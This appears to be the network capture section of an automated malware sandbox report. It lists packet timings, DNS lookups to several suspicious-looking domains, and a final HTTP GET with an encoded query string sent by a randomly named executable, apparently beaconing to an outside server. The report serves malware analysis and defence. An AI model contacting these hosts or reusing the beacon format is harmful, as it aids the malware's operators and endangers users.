                                                                        Oct 8, 2024 16:35:09.393191099 CEST8050018217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:09.393251896 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:10.319777012 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.338428020 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.488181114 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.488271952 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.502243042 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.507563114 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507579088 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507590055 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507600069 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507608891 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507616997 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507626057 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507635117 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507643938 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.005497932 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.135819912 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.135881901 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.135895014 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.135906935 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.135936975 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.135966063 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.136502981 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.136543989 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.137814045 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.137856007 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.138717890 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.138773918 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.028748035 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.033871889 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.034051895 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.043005943 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.050405025 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.672527075 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.672616005 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.672698975 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.675772905 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.675772905 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.680685997 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:21.046747923 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:21.052447081 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.052520990 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:21.067187071 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:21.072046995 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.787060976 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.787108898 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.787157059 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:22.583673000 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.603425980 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.608508110 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:23.610059977 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.621690035 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.626600027 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:24.220685005 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:24.221061945 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:24.221471071 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:25.130553961 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.151499033 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.241962910 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.242151022 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.255626917 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.260742903 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260868073 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260919094 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260946989 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260973930 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260999918 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.261027098 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.261059999 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.263627052 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.921124935 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.921251059 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.921303988 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:27.771373034 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.795824051 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.802409887 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:28.808836937 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.818638086 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.824367046 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:29.400230885 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:29.400391102 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:29.400430918 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:29.403633118 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:29.408571959 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:34.435528040 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:34.440704107 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:34.440957069 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:34.452384949 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:34.457371950 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:35.132344961 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:35.132374048 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:35.132417917 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:35.958698988 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:36.978768110 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:36.983808994 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:36.983875990 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:36.998725891 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:37.003684044 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:37.637835026 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:37.637964964 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:37.638029099 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:38.505673885 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.526238918 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.738636971 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.738728046 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.753546953 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.758513927 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758548975 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758589983 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758599043 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758706093 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758716106 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758797884 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758807898 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758811951 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:40.493004084 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:40.493032932 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:40.497998953 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:41.258599997 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.274813890 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.279771090 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.279973030 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.287867069 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.293370962 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.902800083 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.903681040 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.903754950 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.906014919 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.911441088 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:47.930179119 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:47.934983015 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:47.935965061 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:47.947877884 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:47.953037024 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:48.432420969 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:48.432482004 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:49.458779097 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:49.463730097 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.477797985 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:50.482989073 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.483133078 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:50.494606972 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:50.499946117 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.957473040 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.957525015 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:52.005681992 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:52.254498959 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.024894953 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:53.233117104 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.233215094 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:53.247423887 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:53.252402067 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252412081 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252420902 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252433062 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252469063 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252477884 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252506018 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.253309965 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.253334999 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.691585064 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.691643953 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:54.755703926 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:54.760746002 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:55.775307894 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:55.780947924 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:55.781034946 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:55.789122105 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:55.794038057 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:56.288558960 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:56.288618088 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:56.288841963 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:56.292220116 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:56.297015905 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:36:15.613529921 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:15.618882895 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:15.618952036 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:15.630598068 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:15.635508060 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:16.502734900 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:16.503206015 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:16.506159067 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:17.146498919 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.167521000 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.172797918 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:18.172966957 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.184499025 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.189511061 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.053726912 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.055104017 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.055162907 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:19.098870993 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.098938942 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:19.693242073 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.712112904 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.718108892 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.718442917 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.728841066 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.733738899 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733751059 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733762026 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733834028 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733843088 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733851910 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733865023 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733927011 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.734517097 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:21.606004000 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:21.606134892 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:21.606189966 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:22.240268946 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.269835949 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.274727106 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:23.274791956 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.290067911 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.295042992 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:24.174876928 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:24.175364971 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:24.175518036 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:24.180017948 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:24.184894085 CEST805004043.242.202.169192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 8, 2024 16:33:57.829544067 CEST5048653192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:33:58.316391945 CEST53504861.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:03.337913990 CEST5673953192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:03.348748922 CEST53567391.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:08.368325949 CEST5509953192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:09.057019949 CEST53550991.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:24.622490883 CEST6034853192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:24.650665998 CEST53603481.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:37.790368080 CEST5682953192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:38.400415897 CEST53568291.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:51.743760109 CEST5090753192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:51.898288965 CEST53509071.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:05.556327105 CEST5587053192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:05.720515966 CEST53558701.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:19.681600094 CEST5347853192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:20.679812908 CEST5347853192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:21.043582916 CEST53534781.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:21.043616056 CEST53534781.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:34.415728092 CEST6222053192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:34.432383060 CEST53622201.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:47.915585041 CEST5556553192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:47.927587986 CEST53555651.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:36:01.305721998 CEST6498453192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:36:14.931503057 CEST5106153192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:36:15.611063004 CEST53510611.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:36:29.198466063 CEST6273153192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:36:29.672023058 CEST53627311.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 8, 2024 16:33:57.829544067 CEST192.168.2.41.1.1.10x82f0Standard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:03.337913990 CEST192.168.2.41.1.1.10xa947Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:08.368325949 CEST192.168.2.41.1.1.10xd42dStandard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:24.622490883 CEST192.168.2.41.1.1.10xad91Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:37.790368080 CEST192.168.2.41.1.1.10xef32Standard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:51.743760109 CEST192.168.2.41.1.1.10x41a8Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:05.556327105 CEST192.168.2.41.1.1.10xfcb6Standard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:19.681600094 CEST192.168.2.41.1.1.10x2945Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:20.679812908 CEST192.168.2.41.1.1.10x2945Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:34.415728092 CEST192.168.2.41.1.1.10xca74Standard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:47.915585041 CEST192.168.2.41.1.1.10xa03aStandard query (0)www.dyme.techA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:36:01.305721998 CEST192.168.2.41.1.1.10x8345Standard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:36:14.931503057 CEST192.168.2.41.1.1.10x3405Standard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:36:29.198466063 CEST192.168.2.41.1.1.10x705Standard query (0)www.nobartv6.websiteA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 8, 2024 16:33:58.316391945 CEST1.1.1.1192.168.2.40x82f0Name error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:03.348748922 CEST1.1.1.1192.168.2.40xa947Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:09.057019949 CEST1.1.1.1192.168.2.40xd42dNo error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:24.650665998 CEST1.1.1.1192.168.2.40xad91No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:24.650665998 CEST1.1.1.1192.168.2.40xad91No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:24.650665998 CEST1.1.1.1192.168.2.40xad91No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:38.400415897 CEST1.1.1.1192.168.2.40xef32No error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:38.400415897 CEST1.1.1.1192.168.2.40xef32No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:51.898288965 CEST1.1.1.1192.168.2.40x41a8No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 8, 2024 16:34:51.898288965 CEST1.1.1.1192.168.2.40x41a8No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:05.720515966 CEST1.1.1.1192.168.2.40xfcb6No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:05.720515966 CEST1.1.1.1192.168.2.40xfcb6No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:21.043582916 CEST1.1.1.1192.168.2.40x2945No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:21.043616056 CEST1.1.1.1192.168.2.40x2945No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:34.432383060 CEST1.1.1.1192.168.2.40xca74No error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:34.432383060 CEST1.1.1.1192.168.2.40xca74No error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:47.927587986 CEST1.1.1.1192.168.2.40xa03aNo error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:35:47.927587986 CEST1.1.1.1192.168.2.40xa03aNo error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:36:01.581528902 CEST1.1.1.1192.168.2.40x8345No error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 8, 2024 16:36:15.611063004 CEST1.1.1.1192.168.2.40x3405No error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                                                                        Oct 8, 2024 16:36:29.672023058 CEST1.1.1.1192.168.2.40x705No error (0)www.nobartv6.website103.224.182.242A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.elsupertodo.net
                                                                        • www.omexai.info
                                                                        • www.tekilla.wtf
                                                                        • www.bola88site.one
                                                                        • www.languagemodel.pro
                                                                        • www.kexweb.top
                                                                        • www.jobworklanka.online
                                                                        • www.dyme.tech
                                                                        • www.mizuquan.top

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449736148.72.152.174802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:09.075884104 CEST558OUTGET /2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.elsupertodo.net
                                                                        Connection: close
